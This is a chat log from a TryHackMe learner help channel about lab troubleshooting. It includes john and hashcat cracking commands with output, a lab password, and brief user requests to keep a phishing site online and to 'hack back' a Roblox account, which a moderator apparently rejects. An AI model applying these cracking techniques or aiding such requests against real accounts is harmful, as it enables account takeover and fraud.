Basically if I spend more than x time on a box without any progress I'll either put it away and come back to it, or peek at a write-up, one line at a time (trying not to spoil it).
At the end of the day, if you don't know a technique, no sense in staying stuck in the mud forever IMHO
(NGL I do have a no hints subfolder for my writeups I completed wthout hints))

Is there a plugin or scanner to test whether the URL has LLM prompt word injection? Can you recommend it

Hei, everyone I am Yeeun, I am a student of cybersecurity. I have to finish about 25 tryhackme labs to complete my assignment.

https://tryhackme.com/room/bypassreallysimplesecurity,

can not log in

The connection has timed out

An error occurred during a connection to www.google.com.

The site could be temporarily unavailable or too busy. Try again in a few moments.
If you are unable to load any pages, check your computer’s network connection.
If your computer or network is protected by a firewall or proxy, make sure that Firefox is permitted to access the web.

in mozilla firefox, even google.

Can you specify the issue you are having? Where can't you login exactly?

Suggest asking this in #infosec-general

not log in, it is the connection in firefox.

thanks

Yah this confort me cuz i saw that im the only that spend time to check the writeups to learn how to solve something that i still dont know, but the key is learn

In "Carrers in Cyber" on the second task it doesnt detect that my answer is in english when it clearly in english

i restarted my pc the site and typed it in multiple times still doesnt work

even tried it in different kinds of english uk and australian

You have to get all the characters right, in the right order (e.g. I think you meant Careers in Cyber).
A bane to dyslexics everywhere, but 'tis what it is 🤷‍♂️

It's not a sprint or even a marathon; the only constant is more stuff to learn 💡

yah ty

Gave +1 Rep to @gleaming oxide (current: #138 - 78)

Hi

hey has anyone managed to connect on OpenVPN on windows? everything is fine for me up until there's some login prompt

Hi, I'm facing the same issue. Did you solve it?

Please help me hrere

Have changed again, now is Untrusted

im stuck on this part
on the room: https://tryhackme.com/room/investigatingwindows

I've tried everything and I can't make any progress...

hint: the answer to the question above this one should help you out on the correct day you should be investigating.

I'm on the Nmap basics room and I can't figure out the password for root@dull apex. I'm using ssh tryhackme@(ip address in the room), but I don't know what the password is. tryhackme doesn't work and neither does THM123.

https://tryhackme.com/room/nmap

Hi

I need help getting over the Security in the Pipeline Topic Transition Recap, got stuck at a question that does not look like topic recap:
"What curl command would successfully retrieve the emergency override information from the alien-loaders API endpoint on target 10.10.50.100?"
& does not accept anything from the related room it asks about.

This question seems to be about particular details of a gamified challenge, I don't see how it can actually qualify as a topic recap.

you don't use ssh in this lab. Either use your own vm over openvpn or the attackbox gui provided.

any idea why I can't attach a photo?

Hi everyone,
I’m currently a college student working toward a career as a SOC Analyst and I’m trying to build some hands-on projects for my resume before applying for internships.
I’ve been learning cybersecurity fundamentals through TryHackMe, and I want to create projects that actually stand out to recruiters and show practical blue-team/SOC skills.
What project ideas would you recommend for someone aiming for a SOC Analyst internship?

hi everyone

need help on SOC simulator

hello guys, anyone had problem with " https://tryhackme.com/room/benign " room?
can't access splunk, no links, not accessible via localhost:8000

Hey guys. Does anyone know how I can get in touch with a THM rep? I have tried different ways, and I have a time-sensitive request. I can't start a VM. Getting an "Unauthorized" error everytime I try to start or terminate a VM. I can't progress, can't go back, nothing. On a minor note, I am about to lose my streak due to forced inactivity above.

Hey. I'm working on Windows Threat Detection 2 and this is the 2nd time I've attemted this room. The malware in task 3 does not behave as expected, there is supposed to be process creation, but there aren't any that are even symilar to those shown in the walkthoughs I see posted online.

if u havent already, open a ticket with THM Help, also email support@tryhackme.com.  re:Streak i've had great luck with THM restoring a Streak - just let them know the Days and your THM username (case sensitive)

As for the streak, I just reset my progress in the Blue room. It is super easy and has a lot of questions you get right just by hitting the answer button. Streak saved! Will work on resolving issues next. Thanks!

Gave +1 Rep to @slim bison (current: #347 - 28)

Hello folks, I'm Tony

Hello! I really need some help on Active Directory Basics. For the life of me I cannot get past task 4 despite following several tutorials. I've used RDP successfully via AttackBox (via command line and Remmina) and OpenVPN and can login as admin and phillip and change sophia's password (I've done all of this several times via multiple ways). But when I try to login as sophia I get hit with the error message "you must change your password before logging on the first time." I would attach a screenshot but for some reason that's not showing up as an option for me on this discord

https://help.tryhackme.com/en/articles/6495858-discord-how-do-i-verify-my-tryhackme-account

Suggest posting this in #cyber-and-careers

You'll need to verify your account to be allowed to do so.

@dusky wave

instructions are wrong - skip the Set-ADUser command and just RDP as sophie with the new password you create with the 1st command

Hey THM, if the point of Metasploit exploitation is to teach anger, then congrats, you did the job well

Also, if the plan was to get a person mad at the AI, then congrats again

Hey, what specific issue or challenge are you having?

Hello I'm in hashing basics room for task 6 and I used hashcat. It told me that the estimated time to find the password for the first task is 10 hrs is this really true😭

xD no

mainly within a minute

Hello. In the prompt defence room, under AI security -
The agent from whom we're supposed to extract the flag from simply gave it away after I typed "Hi". Is this by design?

yeah, it gives flag directly to many of us.

I see but it's currently taking kinda long(its been 10 mins). Did I select the wrong hash mode

interesting. the build up made it seem like we're gonna have to wrack our brains for it

yeah, maybe your hash file contains wrong formate for hash or if its correct then yeah hash mode will be different

use hashid online tools to identify hash.

Gave +1 Rep to @dull apex (current: #43 - 267)

alright thanks for the help mann

Gave +1 Rep to @analog heath (current: #452 - 19)

thank you for help!

Gave +1 Rep to @vagrant fern (current: #11 - 944)

Hi

Hey may I get some help please? im trying to use recon-ng theHarvester and google dork but I am really lost. Most of the commands doesn't work and I've tried useing the help command but I'm really confused

can you post your hashcat command syntax- this one cracks in seconds - where did you read 10 hrs?

$2a$06$7yoU3Ng8dHTXphAg913cyO6Bjs3K5lBnwq5FJyA6d01pMSrddr1ZG:REDACTED
                                                          
Session..........: hashcat
Status...........: Cracked
--snip--
Started: Tue Apr 28 08:06:10 2026
Stopped: Tue Apr 28 08:06:23 2026

I just tried to check out the room that is in #announcements, and this is what I got:

Edited - I made a silly mistake! Found my token 🙂 thank you

Gave +1 Rep to @slim bison (current: #339 - 29)

I did that and it worked! Thanks so much

Gave +1 Rep to @slim bison (current: #332 - 30)

Hey, could i DM someone to help me a little bit on the Metasploit: Exploitation room?

just post your question here and we'll help you out 🙂

Oh, ok! So I was doing the Task 5 - exploitation. But when running the eternal blue payload it says the target is not vulnerable.

Sorry if this is a basic question, I'm a complete beginner just starting my journey into cybersecurity.

Just to confirm, do you have the correcr target VM running?

Oh, just act like I was never here

But thank you!

Gave +1 Rep to @vagrant fern (current: #11 - 945)

glad it worked out 🙂

Hello guys I’m new here
Please I want to learn ethical hacking
Can anyone teach me

Do check #start-here

The Wazuh room does not work, I'm on task 4 last question, I'm trying to count the security events that have been generated by AGENT-001. I put in the date range and nothing appears. "Note: You will need to make sure that your time range includes the 11th of March 2022" this doesn't exactly tell you the time frame either. It just says include this time, it doesn't indicate whether it's the starting point or the end point.

Hello guys,
In the room active directory basics the forth task it requires us to log in as the employee Phillip how do i do that?

What do you mean? I recently did this, and helped another user with a similar problem.

It says login using a remote desktop as an employee of the bigger organisation ( the whole machine of that room )

I am confused as like how do i exactly log in is this something i do inside the machine itself or what i saw the video he seems to do it with the attack box but i have followed him and it didn't work

What to do
Stay on the current Windows machine the room gives you
Press Ctrl + Alt + Delete
Choose Switch user
Log in with:
Username: THM\phillip
Password: Claire2008

If that doesn't work, try THM\phillip

If that doesn't work, just tell me exactly the problem you are having. I'll see what I can do

Got to go, so hope it works!

What should I do? I'm starting in cybersecurity for the first time and I'm on the 'Intro to Defensive Security' task 4. It asks: 'What is the flag that you obtained?'. I need help, please. Thank you!

It worked honestly thank you bro and sorry for replying late i got too invested in the room i forgot😭thank you again

Gave +1 Rep to @torpid pulsar (current: #1488 - 4)

@plush grove On that one follow the directions on the site on the last step it'll give you the flag code

Had to be honest did no understand the guide sorry 😅

Did you figure it out?

in active directory basics im trying to login as phillip

but the problem is the turorial doesnt indicate how

how i do that

I'm playing through the Ra 2 room and I can't figure out why my commands aren't working (I already looked at the walkthrough) and neither the DIG nor anything else seems to work. Is this a problem with me or the room and the host?

I connected the AttackBox and everything worked fine. I'd be very grateful if someone knowledgeable could tell me what's wrong on my machine (kali linux), how to adjust the configuration files, or anything else?🙏

hi everyone! I'm new here, currently transitioning into Security Analyst role. I’m building hands-on skills through the Security Analyst learning path on TryHackMe. I’m excited to learn and connect with everyone!

How Do I report a bug:
https://tryhackme.com/room/mitre
is linking to https://attack.mitre.org/matrices/enterprise/ Which is v19 (https://attack.mitre.org/versions/v19/matrices/enterprise/)

but the category in task 2 q1 (What Tactic does the Hide Artifacts technique belong to in the ATT&CK Matrix?) is expecting the category from v18 (https://attack.mitre.org/versions/v18/matrices/enterprise/) since "Defense Evasion" was renamed to "Stealth"

I cannot upload the screenshots I have taken here...

You can create an entry for it in #1333993673381253162

Also, you'll need to verify your account to post screenshots

@hidden magnet

Is your OpenVPN configuration file pointing to the same region where the target is spawned?

Vulnerability scanner overview, my attackbox can not connect https://127.0.0.1/

i dont think it runs on the attackbox

i see

its probably running on the machine attached to the room

ovpn?

do u have alink to the room

i dont have, its only attackbox

oh i got it its on Practical Exercise!

but it still the same... Unable to connect

the room you are working on should have a link right

yes

have you tried this IP?

what's the task? and are you trying to connect to openvas web?

then check on which port does openvas is running, and use that port, like http://127.0.0.1:9392/login/login.html

yes

but now even i cannot open tryhackme website

like loading ...

could you ping it?

yes i can ping

try with other browser or clear the browser cache

others browser also same

clear doesnt work

maybe network issue, use your mobile as USB tethering for network.

only from Opera work

r u on vpn on opera?

no

and whats your operating system? windows or linux

windows, vm linux

openvas can not on THM machine

is it on attackbox

working on metasploit exploitation, and when trying to run the wordslist, i keep getting this

I am trying on my home machine and verified that the filepath is right

i think your wordlist path is nor correct

see, you typer ...metasploit/metasploitWordliistmetasploitWordlist... u wrote it 2 times so make sure your path is correct

does THM site opens?

attackbox openvas error

yes open

okay, and i think u had a openvas on docker, then start it

u need to install it.

sudo systemctl enable docker

sudo systemctl start docker

can u send me room link?

https://tryhackme.com/room/vulnerabilityscanneroverview

nah my path is correct

maybe permission issue, copy the wordlist and then save it to your current location with simple name like wordlist.txt

it's got read for owner/user/group

just checked that too lol idk

i gotta go though ill troubleshoot morel ater

or just use the attack bot

wait stop it.

its done, complete

its already there i think run sudo docker start openvas

@wise dune sudo docker start openvas and then follow url. right

if not terminate the machine and restart it.

sudo docker start openvpn

are u doing this on attackbox?

yes

u should do on the openvpn attached machine by split screen. terminate attackbox

when target machine starts it also provide this split screen VM right? there u have to do, it should work now 😉

use sudo

sudo docker start openvas

thank you so much!

Please, I'm stack here for 2 days now..
I tried:
from browser with mobile view on inspection mode.
with burp suit interseption to change the user-agent -? iphone or android
terminal: again to change the user -agent

cant find the solution 🙁

you need to to fuzz endpoints use ffuf

Hey, I am currently in the Blue room, task 1. The third question asks "What is this machine vulnerable to?". I figured that out with a nmap --script vuln scan but i was wondering if there is some better more effective method to do this?

how can i practice splunk and log analysis?

i tried it..and nothing.. with a lot of wordlists...

show me your output, syntax,method, i went back and got it 1st time, wordlist choice and syntax matter. re: 2 days - stop doing this to yourself, write-ups and YT videos are plentiful when stuck, no shame - only efficient way to learn

i keep getting this with john doesnt matter if i use the attack box or my machine. in the linux privesc room

on my machine not the thm vm

Hi this is md masud

your echo command using double quotes is mangling the hash with bash expansion. Use single quotes to preserve it. Also, check your hash for hidden chars cat -A hashes.txt - copy-paste can be a b**** sometimes;)

is anyone else having trouble with the Windows browser machines? im trying to do the windows security monitoring module in the SOC level 1 learning path and every time the VM spins up with in 2 or 3 minutes the machine freezes. iv tried restarting the browser, closing through task manager and re opening. i have tried restarting my computer too. other VMs and rooms are working just fine its just in that specific room.

no hidden characters but honestly i didnt even think about the double quotes. Im just so used to echoing strings that i didnt think about the quotes not being necessary for a hash

your're welcome- bash will try to expand what it thinks are variables anything starting with $ - that was your issue, surprised you haven't come across this previously

im still an infant trying to learn to crawl when it comes to bash

well grow up already, you aint getting any younger and bash is here to stay;)

im getting better, but scripting has never been a strong skill for me. i'll be propping myself up and walking here soon

ya don't skip bash basics, that knowledge gap will haunt you on everything your future self works with

yeah ive learned that much. i google and make a lot of notes on what im trying to do in bash

it doesnt help that at work i dont have a linux machine that forces me to continue using bash

but far too many tools at work depend on windows

sigh, john is still telling me that no hashes are loaded

it appears i didnt have john jumbo

what is your distro? the attackbox comes with jumbo

ubuntu. attackbox was also giving me the same thing saying that there was no hash

i just went through a whole process to get jumbo and it's still like lol nah

i mightve found it. there's a hidden $ at the end of the hash value in hash.txt

doesnt show up if i vim into the file

hi

i'm not at your keyboard, so haven't a clue what your issue is, but i'm unable to reproduce it from my own kali instance or the attackbox, sorry - i suspect your hash is getting corrupted somehow by the way you save it to a file. The $ is expected using the -A flag with cat and will not effect the hash.

tbh im not either. I moved on, everything else worked perfect

Thank you for your help though

I really appreciate it

all good - come back to the attackbox fresh another time, try using nano to save the hash you copy to clipboard, then sanity check it looks correct using cat, then use it with john

i struggle with nano, which is why i use vim lol

hi

bro what

link to room? looks like wrong target (port 80 vs 81) also, did u type the answer( hidden chars are a thing sometimes with copy-pasta)

it’s the newly released room called basic vulnerability identification and i will try that thx

hi all , starting today ethical hacking!

i had a little issue going trought the tutorials , could someone debug / help me out ?

Hi

Which room are you facing issue with?

i'm at the Experience Cyber Security level stage2.py my VM gave me THM{ATTACK_F_OUND} but it doesnt fill the gap to answer right

Can you share the room link?

THM{ATTACK_FOUND} but goes like that

https://tryhackme.com/room/careersincyber

ok sry misunderstood the room

there is no questions in this room

is this the correct link?

yes that is the one actualy showing

Pre Security
Introduction to Cyber Security
Experience Cyber Security this is the path on the website

ok seems fixed ! thanks

I glad it is fixed

All the best!

you too , seems also that maybe i did something wrong

HAGD

no worries, it happens all the time

Thanks!

Gave +1 Rep to @tepid stump (current: #3749 - 1)

Hi, I'm in the "Metasploit: Introduction" room, trying to run the EternalBlue exploit on the target machine, but it fails everytime, ending with "Exploit completed, but no session was created."

Need help with room Custom Tooling using Burp Challenge

Hi, I'm in the rabbit store CTF room, and it's impossible for me to connect to the website (i tried with the attackbox and the VPN on my laptop) and waited 10/15 minutes before connecting. When i modify manually in the /etc/hosts i can access to the website but only the page a specificaly added to the hosts so it make no sense to me to add everything manually. Does someone have an idea ?

What did you add to /etc/hosts?

[IP-addr] cloudsite.thm

Then yeah, only pages under cloudsite.thm will render correctly

So if you want to request e.g. web.cloudsite.thm you need to add it to /etc/hosts as well

[IP-addr] cloudsite.thm web.cloudsite.thm

ohhh ok

because when i wanted to go to the login page nothing showed

What did login page URL look like?

secure.cloudsite.thm or something like that

Yeah, then you have to add it to /etc/hosts

ok ok but that's a bit strange the need of adding every webpage like that

It isn't tbh. In real internet DNS server does that for you.

Here, we don't have DNS so we need to do it ourselves

yeah ofc, but i mean usually i never need to do that, but ok thank you, i just hope it won't cause issue for this room

Gave +1 Rep to @ashen crane (current: #46 - 260)

It shouldn't - that's a standard procedure for rooms that use domains and not IP addresses

ok ok, thank you then 🙏

Anyone done( Elastic: Query Languages) room on TryHackMe?
I need a help

Hey guys, m'm stuck on the 'Experience Cyber Security' room, Task 4 (Become a Defender). I can't find the flag or change it from account detected to Account Locked. I've tried a few times now and it's not working 🙁

got a link? what's not working? what did you try?

got a link? what did you try?

For best results, make it easy for folks to help:

• include a link to the room you're on
• mention what's not working
• mention what you've tried so far

sharing link now - https://tryhackme.com/room/careersincyber

...?

I don't know whats happen -VM gave me THM{ATTACK_F_OUND} but it doesnt fill the gap for the right answer and is not changing from account detected to account locked after following the instructions

Do you see No answer needed and the Check button?

nope - i have a 'Now that we have ran the script, what is the flag located at the top of the page in Firefox?'

then you're not in task 4 of the room you linked...?

it's the right link - its working for me when i open it in a new tab 🙁 not sure what is happening

what's the heading on Task4 and Task5?

Task 3 is Become a Defender and Task 4 is Become an Engineer

screenshot

i have the same, can it be that changes were made to the room?

I have a problem with the pyramid of pain, specifically the first question in task 6. I don't really understand what I should do, and I did look through walkthroughs, but they all ask about the browser. The question they ask now is different

Hey everyone, new here! Working on a project involving WordPress security and running into standard malware scanners that keep missing clouded and database-resident backdoors. Anyone here dealt with this before or built anything to tackle it?

why this if the salt its already on hash? im trying using john --format --wordlist hash.txt and i put a max and min length of 6.. but its take too long to get the password, somthing here that i dont see?

Without the [correct] salt, you have no hope of ever confirming the password that matches the hash.
If it takes too long, try using a wordlist instead.
If it's 6 digits and random, just let it run overnight 🤷‍♂️
You can also try hashcat (properly setup it can use your GPU), but you may need to generate the wordlist of possibilities to try 🤔

yah i discover but it took me 12min =[

idk if this is normal

your terminal output would be helpful, is this drupal7? the salt needs to be 8 chars. my test cracked instantly

i thought this was SHA1

Yo

Can someone hack me back into my Roblox account

@primal pollen

that hash in your screenshot looks malformed - what lab is this? hard to troubleshoot with bad data

Hash: $6$aReallyHardSalt$6WKUTqzq.UQQmrm0p/T7MPpMbGNnzXPMAXi4bJMl9be.cfi3/qxIf.hsGpS41BqMhSrHVXgMpdjS6xeKZAs02.

Salt: aReallyHardSalt

IS A cRACK THE HASH

ty- that's more like it sha512 about 70 sec for me

ms@Mac ~/Documents/THM/Splunkfun % john-gcc newhash --length=6 -w=/Users/ms/Downloads/seclists/rockyou.txt     [04-30-26 18:40:04]
Warning: detected hash type "sha512crypt", but the string is also recognized as "sha512crypt-opencl"
Use the "--format=sha512crypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 ASIMD 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
waka99           (?)     
1g 0:00:01:09 DONE (2026-04-30 18:41) 0.01444g/s 9184p/s 9184c/s 9184C/s waman1..wa0563
Use the "--show" option to display all of the cracked passwords reliably

Gave +1 Rep to @primal pollen (current: #2437 - 2)

ahh yah .. how do u got in 1min ?

i put like this

john --format=sha512crypt --wordlist=/usr/share/wordlists/rockyou.txt sg_hash.txt
and take 12min

that's jumbo-john optimized for arm64 what CPU you using?

RX 570

i5

there ya go - im just on faster harware is all - yours works just fine

ty so much bro

just realized you were the guy with 1k rooms completed

try adding --length=6 to prefilter the wordlist - should be faster

now you know why - i crack hashes 12x faster;)

https://tenor.com/view/so-true-gif-24068595

ina real scenario that we dont know the length of the pass.. what we could do it?

just wait?

just let it run, touch grass, grab a coffee

ah ty, ok 😄

Gave +1 Rep to @slim bison (current: #325 - 32)

that or use a different wordlist/ruleset 🤷‍♂️

Yo

Can some1 tell me how to keep my phising website like alive for long the tunnel i am doing with windows just keep changing link and cloudfare isn't working for me for some reason is there any way to keep it online for long I am using windows btw

Hi, I'm stuck on the Burp Suite room - Q3 answer submission keeps giving 'There was a problem, please try again later.' My answer is yea but it won't submit. Can anyone help?

I need help with the (Elastic: Query Languages) room from Task 3 to Task 6.
Can anyone please guide me step by step or give some hints?

hey... which Burp suite room are you working on. please send link..

Which room are you working on?

Howdy!
Having some issues with https://tryhackme.com/room/annie
Figured out the steps on my won, and when it didn't work, checked some walkthroughs... I had the right steps (||python2, ip/shellcode|| edits and everything), but it's still not working 🫠
Anyone available for a sniff-test? (is the box broken, or am I?)

hi,could you help me ı was trying to get verified but ı couldn understand what should ı dm the try hack me bot

windows servers VM its always a madness to keep connection =[

u get this sorted? Where did you get stuck? the exploit code works reliably when converted from python2 to python3

I'm in need of help in the Linux 3 room. It is asking "When will the crontab on the deployed instance (10.65.148.200) run?" . When i try the command there are no processes listed, it just keeps showing the directions to edit. I tried ls -la /etc/cron* but i dont know which one would be the answer?

try crontab -l

i did, but it would only show the instructions on how to edit cron

tryhackme@linux3:~$ crontab -l

Edit this file to introduce tasks to be run by cron.

Each task to run has to be defined through a single line

indicating with different fields when the task will be run

and what command to run for the task

To define the time you can provide concrete values for

minute (m), hour (h), day of month (dom), month (mon),

and day of week (dow) or use '*' in these fields (for 'any').

Notice that tasks will be started based on the cron's system

daemon's notion of time and timezones.

Output of the crontab jobs (including errors) is sent through

email to the user the crontab file belongs to (unless redirected).

For example, you can run a backup of all your user accounts

at 5 a.m every week with:

0 5 * * 1 tar -zcf /var/backups/home.tgz /home/

For more information see the manual pages of crontab(5) and cron(8)

m h dom mon dow command

@reboot /var/opt/processes.sh

im at burpsuite basics task 10 and i made a foxy proxy to try and get the flag while looking around the site...but whenever i enable the proxy the site will load endlessly i tried using echo but he couldnt generate a response the burps browser doesnt work aswell the proxy settings are like asked....127.0.0.1 on port 8080 but it doesnt work

Nevermind i figured out the answer

Hi guyz i'm rex , i just joind the server ! i'm really interested in learning about computers !

Hello and welcome

Don't forget to verify

Is it actually possible to complete the room "Lateral Movement and Pivoting"? Nearly every task involves going to za.tryhackme.com, but "za.tryhackme.com" doesn't exist

I'm having the same problem lmaooo wth is going on

It is possible to complete the room if you follow the steps to set up DNS correctly. Just feed the address of the domain controller into your /etc/hosts with "thmdc.za.tryhackme.com"

I did "sed -i '1s|^|nameserver $THMDCIP\n|' /etc/resolv-dnsmasq", as the room says, and za.tryhackme.com is still not recognized

That should be going in your resolv file. You want your hosts file.

Here's mine for example

hey ! i had another issue on first question about lan in Pre Security
Network Fundamentals
Intro to LAN
it asks what lan stands for but it misses one letter to fill ion
in*
its missing the a of arena to be precise

Those are the settings for the room directly after it but it's basically the same

yoo my bad it was area

i would have like local networks to fight in a arena i guess

Where do I find this, I'm sorry I don't see anything about "host file" in the instructions

We don't encourage / tolerate this type of activity in this server. This is the dedicated forum of TryHackMe, a cybersecurity training platform.